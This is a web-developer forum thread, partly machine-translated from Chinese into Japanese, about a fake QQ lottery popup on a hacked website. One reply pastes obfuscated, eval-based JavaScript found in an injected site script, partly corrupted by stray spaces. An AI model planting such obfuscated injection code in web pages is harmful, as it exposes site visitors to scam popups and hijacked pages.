QQ 宝くじの当選メッセージが Web ページにポップアップ表示される

http://www.163sha.com/html/qitanarong/ruchiruzuiDIY/201106/24-8736.html

请大家帮忙看一下，这个页面，还有这个网站首页，有时候打开就在网页右下角弹出来一个QQ中奖消息。好像一个IP第一次打开能看到，但是刷新就看不到了。我把这个页面包含 JS都看了一下，没有发现有这个弹出的JS效果啊，很是郁闷，都疯了。
是不是这个服务器被设置什么了？

求大家帮忙看一下啊，谢谢。。。。。。

回复讨论(解决方案)

我用火狐打开没有弹出来

js做cookie记录即可

2楼是正解，记录到cookie下次读取判断就行了。

买个彩票试试

我怎么开都没弹出来，IE、FF都试了，没有啊？
这个可能是你想要的： http://download.csdn.net/detail/dmtnewtons/4219436

你们理解错了我的意思了，我要去掉这个弹出中奖的消息，这个是弹出的图片消息

我在火狐打开会在右下角弹出这个中奖消息的，然后我选中后查看选中部分源代码有看到这些代码：
                

              

しかし、ソースコードを直接確認するとこれらのコードが表示されないのは非常に奇妙です、コンピューター室に問題がありますか？

コンピューター室とは関係ないはずです。 jsのコントロールポイントです。それらの js は表示されませんか?

確認後、ウェブサイトが存在するフォルダー全体を検索して、文字列「gzzc.com」を含むファイルがあるかどうかを確認しましたが、見つかりませんでした。

あなたは攻撃されたに違いありません。 jsが注入されます。

あなたは攻撃されたに違いありません。 jsが注入されます。
それで、この JS インジェクションはどこにあるのでしょうか? Web サイトが見つかりませんでした

ブロック ページ プラグイン: http://zhidao.baidu.com/question/156709650.html

ブロック ページ プラグイン: http://zhidao.baidu.com/question/ 156709650. html

回答する前に質問をよく読んでください!!!

箇条書きはありません

私の Web サイトはしばらくの間このようになっていますが、これらの JS コードがサーバー コードに見つかりません。 。結局、ウェブサイトを再構築するしか選択肢はありませんでした。

私のウェブサイトもブロックされました

OlOll="(x)";OllOlO=" String";OllOO="tion";OlOllO="Code(x)} " というページの js ファイルでそれを見つけました。 ;OllOOO="Char";OllllOl="func";OllllO=" l = ";OllOOl=".from";OllOll="{return";Ollllll="var";eval(Ollllll+OllllO+OllllOl+OllllOO + OlOlll+OllOll+OlOlO+OllOOl+OllOOO+OlOllO);eval(l(79)+l(61)+l(102)+l(117)+l(110)+l(99)+l(116) + l(105)+l(111)+l(110)+l(40)+l(109)+l(41)+l(123)+l(114)+l(101)+l(116) + l(117)+l(114)+l(110)+l(32)+l(83)+l(116)+l(114)+l(105)+l(110)+l(103) + l(46)+l(102)+l(114)+l(111)+l(109)+l(67)+l(104)+l(97)+l(114)+l(67) + l(111)+l(100)+l(101)+l(40)+l(77)+l(97)+l(116)+l(104)+l(46)+l(102) + l(108)+l(111)+l(111)+l(114)+l(40)+l(109)+l(47)+l(49)+l(48)+l(48) + l(48)+l(48)+l(41)+l(47)+l(57)+l(57)+l(41)+l(59)+l(125));eval(" " +O(99005434)+O(109891017)+O(98017879)+O(115835235)+O(107918387)+O(99992910)+O(108905601)+O(114841149)+O(45549578)+O(117816) 923 )+O(112864240)+O(103954969)+O(114849803)+O(99990869)+O(31687465)+O(39604343)+O(38611951)+O(59403806)+O(82178168)+O(663381) 64 )+O(81184638)+O(72271089)+O(79206874)+O(83168778)+O(31689655)+O(113855151)+O(112864408)+O(98010957)+O(60390619)+O(33661487) )+O(102962358)+O(114844131)+O(114849439)+O(110883355)+O(57429223)+O(46539706)+O(46539243)+O(117817991)+O(117812355)+O(1178) 11069 )+O(45547270)+O(101971757)+O(109895803)+O(109899861)+O(101978895)+O(106921583)+O(99991986)+O(96038462)+O(99004447)+O ( 11385 5296 )+O(106920770)+O(45545277)+O(98013739)+O(109893993)+O(107912961)+O(46536367)+O(113859368)+O(110885479)+O(980164) 83)+O (109894 258 )+O(99008746)+O(99998977)+O(46532597)+O(98012335)+O(110886532)+O(104946386)+O(113851133)+O(33663712) )+ O(61388571 )+O(59400430)+O(46531067)+O(113856900)+O(98012363)+O(112863124)+O(110881606)+O(114846249)+O(6138338) 3)+ O(386199 69 )+O(40596203)+O(58410619));

コンピューターのバックグラウンドに他のソフトウェアがある可能性があります。

まだ表示されていません。

それは確かにハッキングされました。この問題はスペースプロバイダーによってのみ解決できます。私は以前にもその問題に遭遇しました。最近は最新の JS コードがまだ存在します。変な変数名を持つさまざまな転置やコードを見つけるには、それらの JS を探す必要があります

最も重要なことは、抜け穴を見つけることです。

馬はいますか?

おそらくこの問題に到達しました、解決してください